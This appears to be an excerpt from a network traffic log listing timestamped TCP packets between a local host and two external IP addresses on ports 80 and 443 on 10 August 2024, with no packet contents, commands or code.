Aug 10, 2024 16:12:24.929253101 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.929260969 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.929275990 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.929290056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.929305077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.929320097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.929331064 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.929333925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.929352045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.929359913 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.933851004 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.933871984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.933886051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.933896065 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.933900118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.933904886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.933914900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.933917999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.933928967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.933932066 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.933944941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.933950901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.933960915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.933974981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.933994055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.934007883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.934021950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.934036970 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.934042931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.934051037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.934062004 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.934066057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.934079885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.934091091 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.934099913 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.934124947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.934876919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.934892893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.934907913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.934923887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.934937954 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.934943914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.934959888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.934973955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.934988022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.935002089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.935012102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.935015917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.935034990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.935044050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939030886 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939044952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939058065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939084053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939093113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939094067 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939106941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939141989 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939378023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939399958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939414978 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939421892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939429998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939444065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939444065 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939450979 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939466000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939466000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939481974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939483881 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939496040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939511061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939518929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939524889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939536095 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939548969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939558983 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939563036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939577103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939584970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939590931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939604998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939613104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939615011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939630032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939632893 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939642906 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939652920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939661026 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939687967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939688921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939702988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939717054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939730883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939743996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939754963 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939758062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939773083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939775944 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939783096 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939788103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939806938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939815044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939830065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939842939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939851999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939857006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939872026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.939873934 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939881086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.939903975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.944699049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.944776058 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.944797039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.944809914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.944844007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.944856882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.944870949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.944880962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.944880962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.944888115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.944901943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.944902897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.944925070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.944957018 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945105076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945132971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945148945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945169926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945169926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945192099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945197105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945210934 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945225954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945250988 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945265055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945277929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945277929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945277929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945278883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945311069 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945312977 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945324898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945339918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945353985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945369005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945396900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945396900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945396900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945396900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945743084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945756912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945770979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945802927 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945802927 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945898056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945913076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945926905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945935011 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945941925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945974112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.945979118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.945992947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946006060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946021080 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946033955 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946047068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946047068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946047068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946047068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946059942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946069956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946103096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946116924 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946151972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946166039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946182013 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946186066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946238041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946252108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946254015 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946254015 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946265936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946279049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946293116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946317911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946317911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946317911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946317911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946362019 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946372986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946387053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946403980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946417093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946433067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946455956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946455956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946455956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946455956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946472883 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946504116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946522951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946548939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946562052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946583986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946598053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946609974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946609974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946609974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946609974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946620941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946624041 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946635962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946650028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946664095 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946681976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946700096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946700096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946703911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946716070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946717978 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946732044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946744919 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946760893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946774960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946775913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946775913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946775913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946775913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946789980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946791887 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946805954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946820021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946840048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946840048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946840048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946854115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946866989 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946881056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946919918 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946919918 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946919918 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946919918 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.946955919 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.946997881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947244883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947283030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947298050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947310925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947329044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947351933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947365999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947381973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947385073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947385073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947385073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947385073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947406054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947407007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947407007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947417974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947432041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947452068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947452068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947453976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947468996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947484016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947498083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947513103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947525024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947540998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947540998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947540998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947540998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947643995 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947676897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947690964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947705030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947808981 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947808981 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.947937965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947952032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.947967052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948024988 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948024988 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948065996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948080063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948105097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948118925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948133945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948146105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948159933 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948159933 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948159933 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948159933 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948160887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948175907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948191881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948191881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948191881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948214054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948227882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948240995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948255062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948270082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948285103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948298931 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948302984 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948302984 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948302984 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948302984 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948319912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.948338985 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948338985 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.948504925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.949047089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.949115992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.949129105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.949141979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.949157000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.949171066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.949184895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.949203014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.949203014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.949203014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.949203014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.949281931 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.949294090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.949419975 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.970849037 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.970868111 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.970928907 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.970928907 CEST	49754	443	192.168.2.4	162.159.130.233
